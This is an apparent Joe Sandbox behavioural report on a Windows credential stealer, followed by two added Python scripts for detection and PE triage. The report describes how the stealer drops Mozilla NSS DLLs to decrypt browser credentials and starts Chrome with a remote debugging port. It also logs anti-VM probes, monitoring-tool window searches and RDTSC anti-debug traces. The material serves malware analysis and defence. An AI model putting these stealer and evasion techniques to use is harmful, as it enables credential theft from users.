Source: C:\Users\user\Desktop\random(1).exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: mozglue.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\random(1).exe | Section loaded: msvcp140.dll
              Source: C:\Users\user\Desktop\random(1).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\random(1).exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: random(1).exe | Static file information: File size 1833472 > 1048576
              Source: random(1).exe | Static PE information: Raw size of fsoqnkix is bigger than: 0x100000 < 0x1a5400
              Source: Binary string: mozglue.pdbP | source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb | source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp | source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ | source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ | source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb | source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb | source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb | source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
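The PDB strings above are read out of the RSDS CodeView debug record embedded in each dropped file (the ".0.dr" artifacts: nss3, mozglue, freebl3, softokn3, msvcp140 and vcruntime140). Together they are Mozilla's NSS stack plus the MSVC runtime it needs, which Stealc and Vidar carry along so they can decrypt Firefox key4.db/logins.json without the browser being installed. The sample loads wininet.dll and urlmon.dll, and the "[1]" copies sit in the IE INetCache, which is consistent with the DLLs being fetched over WinINet/URLDownloadToFile and then written to C:\ProgramData as the working set. The script below is an added example in Python and is not part of the Joe Sandbox report or of the sample: it walks a directory tree, flags any of those DLL names outside a trusted browser or system directory, and pulls the PDB path, GUID and age out of the RSDS record so the file can be matched against a legitimate build. The scanned tree is constructed inline as a stand-in; the DLL names and the two drop locations come from this report, while the TRUSTED_PARENTS list and the fake DLL layout are assumptions.

```python
from __future__ import annotations

import os
import re
import struct
import tempfile
from pathlib import Path
from typing import Optional

# DLL names this sample writes to C:\ProgramData, taken from the report's dropped-file list.
STEALER_DLLS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll",
                "msvcp140.dll", "vcruntime140.dll"}

# Directories where these DLLs are legitimately found (assumption for this example).
TRUSTED_PARENTS = ("program files\\mozilla firefox", "program files\\mozilla thunderbird",
                   "windows\\system32", "windows\\syswow64", "windows\\winsxs")

# WinINet cache entries carry a "[n]" suffix (nss3[1].dll); strip it before matching.
CACHE_SUFFIX = re.compile(r"\[\d+\](?=\.dll$)", re.IGNORECASE)


def codeview_pdb(data: bytes) -> Optional[dict]:
    """Return the PDB reference from the first RSDS CodeView record, or None.

    Layout: b'RSDS' + 16-byte GUID + 4-byte age + NUL-terminated path.  This is the
    string the report shows as 'Binary string: nss3.pdb'.  Walking the debug directory
    would be more precise; a raw scan is enough for triage."""
    idx = data.find(b"RSDS")
    if idx < 0 or len(data) < idx + 25:
        return None
    guid = data[idx + 4:idx + 20]
    age, = struct.unpack_from("<I", data, idx + 20)
    end = data.find(b"\x00", idx + 24)
    raw_path = data[idx + 24:end if end >= 0 else len(data)]
    if not raw_path.isascii():
        return None
    return {"guid": guid.hex(), "age": age, "path": raw_path.decode("ascii")}


def hunt(root: Path) -> list[dict]:
    """Flag stealer-set DLLs outside a trusted directory, with their PDB reference."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            canonical = CACHE_SUFFIX.sub("", name).lower()
            if canonical not in STEALER_DLLS:
                continue
            full = Path(dirpath) / name
            location = str(full).lower().replace("/", "\\")
            if any(parent in location for parent in TRUSTED_PARENTS):
                continue
            hits.append({"name": name, "path": str(full),
                         "pdb": codeview_pdb(full.read_bytes())})
    return hits


def fake_dll(pdb_name: bytes) -> bytes:
    """Constructed stand-in for a dropped DLL: MZ/PE stub followed by an RSDS record."""
    return (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 200
            + b"RSDS" + bytes(range(16)) + struct.pack("<I", 1) + pdb_name + b"\x00")


def build_sample_tree(root: Path) -> None:
    """Recreate the drop locations from the report under a scratch directory (constructed)."""
    programdata = root / "ProgramData"
    programdata.mkdir()
    (programdata / "nss3.dll").write_bytes(fake_dll(b"nss3.pdb"))
    (programdata / "mozglue.dll").write_bytes(fake_dll(b"mozglue.pdb"))
    (programdata / "readme.txt").write_bytes(b"not a DLL")
    cache = root / "Users/user/AppData/Local/Microsoft/Windows/INetCache/IE/YLNGKWRH"
    cache.mkdir(parents=True)
    (cache / "freebl3[1].dll").write_bytes(fake_dll(b"freebl3.pdb"))
    firefox = root / "Program Files/Mozilla Firefox"   # legitimate copy, must stay quiet
    firefox.mkdir(parents=True)
    (firefox / "nss3.dll").write_bytes(fake_dll(b"nss3.pdb"))


def demo() -> list[dict]:
    """Build the scratch tree, run the hunt, and return hits with root-relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        hits = hunt(root)
        for hit in hits:
            hit["path"] = Path(hit["path"]).relative_to(root).as_posix()
        return sorted(hits, key=lambda h: h["path"])


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['path']}  pdb={hit['pdb']['path'] if hit['pdb'] else '?'}")
```

Point hunt() at a mounted image or a live C:\ drive to use it for real; the PDB path is a weak identifier on its own, but the GUID and age pair is what a symbol server keys on, so a hit whose GUID matches a known Mozilla build is a stolen-but-genuine NSS, while a mismatched or missing record points at a rebuilt or patched copy.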

              Data Obfuscation

              Source: C:\Users\user\Desktop\random(1).exe | Unpacked PE file: 0.2.random(1).exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsoqnkix:EW;axozysaw:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: random(1).exe | Static PE information: real checksum: 0x1cabc1 should be: 0x1c8de0
              Source: random(1).exe | Static PE information: section name:
              Source: random(1).exe | Static PE information: section name: .idata
              Source: random(1).exe | Static PE information: section name:
              Source: random(1).exe | Static PE information: section name: fsoqnkix
              Source: random(1).exe | Static PE information: section name: axozysaw
              Source: random(1).exe | Static PE information: section name: .taggant
              Source: freebl3.dll.0.dr | Static PE information: section name: .00cfg
              Source: freebl3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue.dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: msvcp140.dll.0.dr | Static PE information: section name: .didat
              Source: msvcp140[1].dll.0.dr | Static PE information: section name: .didat
              Source: nss3.dll.0.dr | Static PE information: section name: .00cfg
              Source: nss3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3.dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: random(1).exe | Static PE information: section name: fsoqnkix entropy: 7.955262014812053
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\mozglue.dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\nss3.dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\msvcp140.dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\freebl3.dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\vcruntime140.dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
              Source: C:\Users\user\Desktop\random(1).exe | File created: C:\ProgramData\softokn3.dll
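Every static finding in this section (blank and random section names, an entry point in the last section .taggant, a 7.96-entropy section larger than 1 MiB, sections that are writable and executable at once, and a header checksum that does not match the file) can be reproduced from the section table and optional header without running the sample. The script below is an added example in Python, not code from the Joe Sandbox report or from the sample: it parses a PE32 image by hand, computes per-section Shannon entropy and the imagehlp CheckSum, and emits the same class of findings. Because the sample cannot be embedded here, it constructs a PE whose section order and permissions mirror the unpacked section list above (unnamed, .rsrc, .idata, unnamed, fsoqnkix, axozysaw, .taggant holding the entry point) beside a minimal clean image; the section contents, the 7.0 entropy threshold and the KNOWN_SECTIONS list are assumptions.

```python
import hashlib
import math
import struct
from collections import Counter

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
# Section names a normal MSVC/MinGW link produces (assumption); anything else gets a second look.
KNOWN_SECTIONS = {b".text", b".rdata", b".data", b".idata", b".edata", b".rsrc", b".reloc",
                  b".bss", b".tls", b".pdata", b".CRT", b".didat", b".00cfg"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Optional-header CheckSum, the algorithm behind imagehlp's CheckSumMappedFile."""
    padded, total = data + b"\x00" * (-len(data) % 4), 0
    for off in range(0, len(padded), 4):
        if off != checksum_offset:                      # the field itself is skipped
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)  # ones-complement fold
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def triage(pe: bytes, big_section: int = 0x100000) -> list:
    """Static findings of the kind the report lists: odd names, W+X, entropy, entry point, checksum."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt = e_lfanew + 24                  # optional header: AddressOfEntryPoint at +16, CheckSum at +64
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)
    stored_sum, = struct.unpack_from("<I", pe, opt + 64)
    findings, entry_section = [], None
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i    # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\x00")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, hdr + 8)
        flags, = struct.unpack_from("<I", pe, hdr + 36)
        label = name.decode("latin-1") or "<unnamed>"
        if not name or not all(0x20 < b < 0x7F for b in name):
            findings.append(f"section {i}: empty or non-printable name {name!r}")
        elif name not in KNOWN_SECTIONS:
            findings.append(f"section {i}: non-standard name {label}")
        if flags & SCN_EXECUTE and flags & SCN_WRITE:
            findings.append(f"section {i} ({label}): writable and executable")
        entropy = shannon_entropy(pe[rawptr:rawptr + rawsize])
        if entropy > 7.0:                # compressed resources score high too, so read this with the name
            findings.append(f"section {i} ({label}): entropy {entropy:.3f}")
        if rawsize > big_section:
            findings.append(f"section {i} ({label}): raw size 0x{rawsize:x} > 0x{big_section:x}")
        if vaddr <= entry_rva < vaddr + max(vsize, rawsize):
            entry_section = (i, label)
    if entry_section is None:
        findings.append("entry point lies outside every section")
    elif entry_section[0] != 0:          # packers put their stub, and the entry point, in the last section
        findings.append(f"entry point in section {entry_section[0]} ({entry_section[1]}), not the first")
    computed = pe_checksum(pe, opt + 64)
    if stored_sum and stored_sum != computed:
        findings.append(f"checksum mismatch: header 0x{stored_sum:x}, computed 0x{computed:x}")
    return findings


def build_pe(sections, entry_index: int, bad_checksum: bool) -> bytes:
    """Constructed PE32 image for the demo; sections = [(name, raw bytes, flags)]."""
    file_align, sec_align, opt_size = 0x200, 0x1000, 224
    align = lambda v, a: (v + a - 1) // a * a
    hdr_size = align(0x40 + 4 + 20 + opt_size + 40 * len(sections), file_align)
    sec_hdrs, body, vaddr, rawptr, entry = b"", b"", sec_align, hdr_size, 0
    for i, (name, raw, flags) in enumerate(sections):
        rawsize, entry = align(len(raw), file_align), vaddr if i == entry_index else entry
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)
        body += raw.ljust(rawsize, b"\x00")
        vaddr, rawptr = vaddr + align(len(raw), sec_align), rawptr + rawsize
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0, 0, 0, entry, 0, 0)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, sec_align, file_align, 6, 0, 0, 0, 6, 0,
                       0, vaddr, hdr_size, 0, 2, 0x8140, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    headers = (dos + b"PE\x00\x00" + coff + opt + b"\x00" * 128 + sec_hdrs).ljust(hdr_size, b"\x00")
    image, sum_off = bytearray(headers + body), 0x40 + 4 + 20 + 64
    good = pe_checksum(bytes(image), sum_off)
    struct.pack_into("<I", image, sum_off, good + 1 if bad_checksum else good)
    return bytes(image)


def blob(n: int, seed: bytes) -> bytes:
    """Deterministic high-entropy filler standing in for the packed payload (constructed)."""
    return b"".join(hashlib.sha256(seed + i.to_bytes(4, "little")).digest() for i in range(n // 32 + 1))[:n]


RWX = SCN_READ | SCN_WRITE | SCN_EXECUTE
# Section order and permissions follow the report's unpacked section list; the contents are stand-ins.
PACKED = build_pe([(b"", b"\xcc" * 0x200, RWX), (b".rsrc", b"\x00" * 0x400, SCN_READ | SCN_WRITE),
                   (b".idata", b"\x00" * 0x200, SCN_READ | SCN_WRITE), (b"", b"\x00" * 0x200, RWX),
                   (b"fsoqnkix", blob(0x100400, b"fsoqnkix"), RWX), (b"axozysaw", blob(0x800, b"axozysaw"), RWX),
                   (b".taggant", b"\x60\x9c" + b"\x90" * 0x1FE, RWX)], entry_index=6, bad_checksum=True)
CLEAN = build_pe([(b".text", b"\x55\x8b\xec" + b"\xc3" * 0x1FD, SCN_READ | SCN_EXECUTE),
                  (b".data", b"hello\x00" * 0x40, SCN_READ | SCN_WRITE)], entry_index=0, bad_checksum=False)
```

Run it on a real file with triage(open(path, "rb").read()). Two caveats when reading the output: a zero CheckSum is normal for unsigned binaries (the code treats zero as not set), and high entropy in .rsrc usually means compressed images rather than packing, which is why the name, the W+X flags and the entry-point location are reported separately instead of rolled into one score.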

              Boot Survival

              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\random(1).exe | Window searched: window name: Regmonclass

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\random(1).exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\random(1).exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1050836 second address: 105083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 105083F second address: 1050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c js 00007F06D8B4D9CCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1050A19 second address: 1050A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1050A1D second address: 1050A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F06D8B4D9D8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1050C96 second address: 1050C9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053AF1 second address: 1053B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 call 00007F06D8B4D9CBh 0x0000000c sbb ecx, 225FCE12h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 clc 0x00000017 mov ecx, dword ptr [ebp+122D2C1Bh] 0x0000001d popad 0x0000001e push 8C040BB4h 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053B1F second address: 1053B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053B23 second address: 1053B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053B27 second address: 1053B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 73FBF4CCh 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 sub dh, FFFFFF8Fh 0x00000015 jng 00007F06D851854Bh 0x0000001b or dx, FDD8h 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D3880h], eax 0x00000028 push 00000003h 0x0000002a jnl 00007F06D851854Bh 0x00000030 mov esi, 1AAF121Ch 0x00000035 push 84069BB0h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F06D8518546h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053C15 second address: 1053C8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 76A3BBD7h 0x0000000e mov dx, si 0x00000011 push 00000003h 0x00000013 jmp 00007F06D8B4D9D6h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F06D8B4D9C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000003h 0x00000036 mov edi, 22C85492h 0x0000003b call 00007F06D8B4D9C9h 0x00000040 jmp 00007F06D8B4D9D1h 0x00000045 push eax 0x00000046 jbe 00007F06D8B4D9D4h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053C8C second address: 1053CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F06D8518546h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F06D8518546h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053CA4 second address: 1053CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053CAD second address: 1053CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053D7B second address: 1053D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053D7F second address: 1053D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053D85 second address: 1053DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dh, ah 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007F06D8B4D9CEh 0x00000016 call 00007F06D8B4D9C9h 0x0000001b pushad 0x0000001c js 00007F06D8B4D9C8h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F06D8B4D9CBh 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f jc 00007F06D8B4D9CAh 0x00000035 push ecx 0x00000036 push edx 0x00000037 pop edx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007F06D8B4D9C6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053DE5 second address: 1053DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1053DEF second address: 1053E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F06D8B4D9CCh 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jng 00007F06D8B4D9C6h 0x00000020 pop esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107388F second address: 1073893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073893 second address: 1073897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 1073897 second address: 107389D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exe | RDTSC instruction interceptor: First address: 107389D second address: 1073904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D1h 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F06D8B4D9CEh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007F06D8B4D9D6h 0x0000001e pop edi 0x0000001f jmp 00007F06D8B4D9CEh 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
